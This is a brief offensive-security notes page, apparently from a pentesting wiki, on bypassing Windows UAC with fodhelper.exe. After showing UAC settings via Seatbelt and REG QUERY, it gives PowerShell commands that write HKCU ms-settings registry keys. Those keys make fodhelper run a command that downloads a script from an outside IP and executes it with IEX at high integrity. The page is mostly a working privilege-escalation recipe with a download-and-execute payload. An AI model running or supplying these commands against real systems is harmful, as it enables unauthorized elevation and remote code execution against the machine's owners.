UAC Bypass

Seatbelt.exe

C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe uac

====== UAC ======

ConsentPromptBehaviorAdmin     : 5 - PromptForNonWindowsBinaries
EnableLUA (Is UAC enabled?)    : 1

Registry

We can see REG_DWORD 0x1

C:\>REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1

We can see REG_DWORD 0x5

C:\>REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

Create registry keys and launch PowerShell. Registry key names are limited to 255 characters, registry value names are limited to 16383 characters, and the value itself is only limited by the available system memory.

PS C:\> New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.19.134/run.txt') | IEX" -Force

PS C:\> New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

Then execute, we will prompt with High Level Integritiy

C:\Windows\System32\fodhelper.exe
PreviousSeImpersonate / SeAssignPrimaryTokenNextAutoInstall Elevate

Last updated